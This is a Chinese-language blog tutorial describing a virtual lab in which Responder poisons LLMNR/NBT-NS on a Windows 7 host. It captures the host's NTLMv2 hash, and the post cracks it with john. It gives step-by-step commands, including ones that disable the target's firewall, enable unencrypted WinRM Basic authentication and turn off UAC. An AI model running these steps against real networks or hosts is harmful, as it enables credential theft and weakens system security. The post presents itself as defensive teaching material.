内网渗透-Responder捕获Win哈希

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

实验环境

VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置

netsh advfirewall set allprofiles state off
winrm quickconfig
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重启

Responder

responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求

安装Responder

Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境

apt-get install build-essential git python-dev

从github下载源码

git clone https://github.com/lagandx/Responder.git
cd Resopnder/
git pull

Responder参数

Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

获取NTLMv2哈希

1.开始毒化,监听请求信息

./Responder.py -wfF -I eth0

在这里插入图片描述
此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机
在这里插入图片描述

时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值

./DumpHash.py

在这里插入图片描述
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解

john DumpNTLMv2.txt

在这里插入图片描述
破解出用户名hacker,密码password1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值